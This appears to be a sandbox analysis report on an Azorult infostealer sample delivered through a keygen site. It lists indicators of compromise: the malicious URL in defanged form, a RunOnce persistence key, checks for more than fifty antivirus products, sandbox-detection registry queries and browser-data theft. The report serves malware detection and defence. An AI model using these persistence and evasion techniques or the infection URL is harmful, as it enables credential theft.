azorult | hxxps://keygenninja[.]com/

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation	setups.tmp

Loads dropped DLL 22 IoCs

pid	Process
4136	setups.tmp
4136	setups.tmp
4136	setups.tmp
4136	setups.tmp
4136	setups.tmp
4136	setups.tmp
4136	setups.tmp
4520	A019.tmp.exe
5104	Setup3310.tmp
5104	Setup3310.tmp
5116	px23tnqd4ls.tmp
584	vict.tmp
5160	vpn.tmp
5160	vpn.tmp
5228	IBInstaller_97039.tmp
5160	vpn.tmp
5160	vpn.tmp
5160	vpn.tmp
5160	vpn.tmp
5160	vpn.tmp
5160	vpn.tmp
5264	c0kjmtsswjd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\50bph4mn0rb = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\XOHWF7HDC2\\multitimer.exe\" 1 3.1617573975.606a385752eca"	multitimer.exe

Checks for any installed AV software in registry 1 TTPs 53 IoCs

Security Software Discovery

T1063

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\KasperskyLab	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\ArcaBit	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Bitdefender\QuickScan	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\BullGuard Ltd.\BullGuard\Main	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\G Data\AntiVirenKit	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\FRISK Software\F-PROT Antivirus for Windows	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\TrendMicro\UniClient	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\K7 Computing\K7TotalSecurity	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Vba32\Loader	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Jiangmin\ComputerID	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Sophos	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\McAfee\DesktopProtection	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\IKARUS\anti.virus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Fortinet\FortiClient\installed	multitimer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\colgdlijdieibnaccfdcdbpdffofkfeb\6.37.18_0\manifest.json	askinstall20.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 10 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
221	ipinfo.io
228	ipinfo.io
721	ipinfo.io
886	ipinfo.io
225	ip-api.com
290	ip-api.com
452	ipinfo.io
454	ipinfo.io
797	ipinfo.io
887	ipinfo.io

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe

Drops file in Program Files directory 49 IoCs

description	ioc	Process
File created	C:\Program Files\unins.vbs	Full_Version.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\MaskVPN.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\Install engine 16\stdvcl40.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\Install engine 16\getithelper260.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-E0CJM.tmp	vpn.tmp
File created	C:\Program Files\unins0000.dat	Full_Version.exe
File opened for modification	C:\Program Files (x86)\Install engine 16\ucrtbase.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-6HSD9.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-9G4T1.tmp	vpn.tmp
File created	C:\Program Files (x86)\Install engine 16\is-O2DAT.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\Install engine 16\is-DP6Q6.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\Install engine 16\is-KON4R.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-GEF9J.tmp	vpn.tmp
File created	C:\Program Files\unins0000.dll	Full_Version.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\libMaskVPN.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\Install engine 16\networkinspection.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\Install engine 16\unins000.dat	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-35MK2.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\ipseccmd.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-134IC.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-PLFLA.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-73V5P.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-PL6V3.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-2KMVF.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\unins000.dat	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\ssleay32.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\polstore.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\mask_svc.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\Install engine 16\d3dcompiler_47.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\Install engine 16\Swap.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\Install engine 16\is-5PENF.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\Install engine 16\is-FHEQM.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libCommon.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe	vpn.tmp
File created	C:\Program Files (x86)\Install engine 16\is-7U2M5.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-I4RJ3.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libeay32.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\Install engine 16\PPMd.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\Install engine 16\is-LAKFU.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-1AS5O.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-3FOCF.tmp	vpn.tmp
File created	C:\Program Files (x86)\Install engine 16\is-KRITU.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\Install engine 16\libGLESv2.dll	IBInstaller_97039.tmp

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 15 IoCs

pid	pid_target	Process	procid_target
6212	6892	WerFault.exe	274
7564	1348	WerFault.exe	250
4576	1348	WerFault.exe	250
6192	1348	WerFault.exe	250
7416	1348	WerFault.exe	250
6968	1348	WerFault.exe	250
7780	1348	WerFault.exe	250
7236	1348	WerFault.exe	250
6324	1348	WerFault.exe	250
7216	1348	WerFault.exe	250
7904	1348	WerFault.exe	250
8048	1348	WerFault.exe	250
8112	1348	WerFault.exe	250
4616	1348	WerFault.exe	250
9808	4740	WerFault.exe	171

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs	msinfo32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs	msinfo32.exe

Delays execution with timeout.exe 7 IoCs

evasion

pid	Process
9748	timeout.exe
8488	timeout.exe
5444	timeout.exe
4000	timeout.exe
6068	timeout.exe
6448	timeout.exe
8576	timeout.exe

Enumerates system info in registry 2 TTPs 7 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ECFirmwareMajorRelease	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ECFirmwareMinorRelease	msinfo32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msinfo32.exe

Kills process with taskkill 9 IoCs

evasion

pid	Process
4784	taskkill.exe
5900	taskkill.exe
5172	taskkill.exe
6864	taskkill.exe
7596	taskkill.exe
9004	taskkill.exe
6352	taskkill.exe
4316	taskkill.exe
4444	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "{351AD221-965A-4AB9-861A-D5E2E697D048}"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "5"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 0100000039c780a1196d3aa663b7b9d9522427eec9f94c085d250147ae9e23e9b23eef96a03a2384e2b2327f2d06b2123d962b60c4ae196ec9f6fa88e465	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	Full_Version.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 541eb5fdaf29d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 6bfc50fdaf29d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms	MicrosoftEdge.exe
